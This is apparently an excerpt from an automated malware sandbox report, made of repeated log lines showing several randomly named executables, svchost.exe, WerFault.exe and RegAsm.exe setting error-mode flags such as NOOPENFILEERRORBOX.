                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
